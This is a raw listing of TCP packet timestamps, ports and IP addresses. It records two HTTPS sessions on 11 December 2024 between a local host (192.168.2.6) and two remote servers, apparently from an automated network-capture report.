Dec 11, 2024 11:23:12.349575996 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.349587917 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.349637985 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.349643946 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.349680901 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.356609106 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.356626987 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.356673002 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.356679916 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.356713057 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.363723040 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.363738060 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.363795042 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.363800049 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.363836050 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.370337963 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.370352983 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.370403051 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.370409012 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.370445013 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.377216101 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.377229929 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.377275944 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.377285957 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.377321005 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.383698940 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.383713007 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.383768082 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.383774996 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.383809090 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.528508902 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.528532028 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.528661966 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.528681993 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.528727055 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.535393000 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.535451889 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.535482883 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.535489082 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.535520077 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.535531998 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.542644978 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.542659998 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.542733908 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.542740107 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.542788982 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.548686981 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.548708916 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.548759937 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.548765898 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.548793077 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.548813105 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.555859089 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.555876017 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.555939913 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.555947065 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.555983067 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.562323093 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.562338114 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.562419891 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.562427044 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.562469959 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.569258928 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.569272995 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.569334984 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.569339991 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.569375038 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.575804949 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.575824022 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.575922966 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.575928926 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.575999022 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.720732927 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.720753908 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.720938921 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.720952034 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.721067905 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.727699041 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.727734089 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.727794886 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.727801085 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.727842093 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.734771967 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.734786034 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.734838963 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.734846115 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.734894037 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.740890026 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.740905046 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.740977049 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.740982056 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.741024971 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.748084068 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.748099089 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.748148918 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.748157024 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.748192072 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.754573107 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.754586935 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.754659891 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.754666090 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.754714012 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.761559010 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.761576891 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.761662006 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.761668921 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.761722088 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.768100023 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.768116951 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.768173933 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.768181086 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.768219948 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.917459011 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.917479038 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.917603016 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.917618036 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.917659998 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.919555902 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.919572115 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.919644117 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.919651031 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.919696093 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.926605940 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.926620960 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.926678896 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.926683903 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.926721096 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.933558941 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.933582067 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.933624983 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.933630943 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.933655977 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.933670998 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.940674067 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.940689087 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.940749884 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.940757990 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.940795898 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.947299957 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.947330952 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.947361946 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.947365999 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.947386980 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.947402954 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.954047918 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.954062939 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.954118967 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.954124928 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.954166889 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.960211992 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.960226059 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.960299015 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:12.960304022 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:12.960344076 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.105648041 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.105670929 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.105724096 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.105735064 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.105782986 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.112503052 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.112519979 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.112567902 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.112576962 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.112610102 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.112627983 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.120018005 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.120037079 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.120125055 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.120135069 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.120179892 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.126378059 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.126393080 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.126432896 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.126441002 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.126477003 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.134624958 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.134640932 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.134722948 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.134731054 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.134769917 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.139988899 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.140005112 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.140062094 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.140070915 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.140106916 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.147221088 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.147234917 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.147305965 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.147316933 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.147351980 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.153606892 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.153680086 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.153829098 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.153887987 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.296988964 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.297008038 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.297123909 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.297142982 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.297185898 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.304351091 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.304373980 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.304442883 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.304452896 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.304491997 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.313623905 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.313638926 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.313700914 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.313709021 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.313745975 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.319566965 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.319591045 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.319634914 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.319641113 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.319670916 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.319684029 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.324388981 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.324423075 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.324465990 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.324472904 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.324490070 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.324510098 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.327430010 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.327491999 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.327501059 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.327513933 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:13.327555895 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:13.330729961 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:28.118499041 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:28.118515015 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:28.118668079 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:28.119160891 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:28.119175911 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.344665051 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.344738960 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:29.348104954 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:29.348110914 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.348320007 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.356165886 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:29.403340101 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.784959078 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.785024881 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.785084009 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:29.785087109 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.785099983 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.785145044 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:29.793360949 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.801794052 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.801856041 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:29.801862955 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.810173035 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.810281992 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.810340881 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:29.810348034 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.813244104 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:29.904154062 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.956648111 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:29.956659079 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.980509043 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.980562925 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:29.980567932 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.989856005 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.989913940 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:29.989917994 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.997714043 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:29.997792959 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:29.997798920 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.005461931 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.005506039 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.005510092 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.005516052 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.005553007 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.013288975 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.023416996 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.023468018 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.023474932 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.029017925 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.029078007 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.029086113 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.036787987 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.036906958 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.036915064 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.044555902 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.044609070 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.044615030 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.057305098 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.057384968 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.057394028 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.063884020 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.063919067 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.063936949 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.063946962 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.063985109 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.074692011 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.128532887 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.168587923 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.170907021 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.170973063 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.170981884 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.181471109 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.181478977 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.181546926 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.181554079 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.190004110 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.190057039 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.190062046 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.191867113 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.194240093 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.194294930 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.198677063 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.198683977 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.198733091 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.207076073 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.207083941 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.207137108 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.214884996 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.214891911 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.214941978 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.222908020 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.222984076 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.227010965 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.227086067 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.235012054 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.235078096 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.242950916 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.243031025 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.247112989 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.247188091 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.258826017 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.258886099 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.263241053 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.263299942 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.269227982 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.269292116 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.361115932 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.361227989 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.367400885 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.367466927 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.371241093 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.371292114 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.376498938 CET	443	49759	104.21.84.67	192.168.2.6
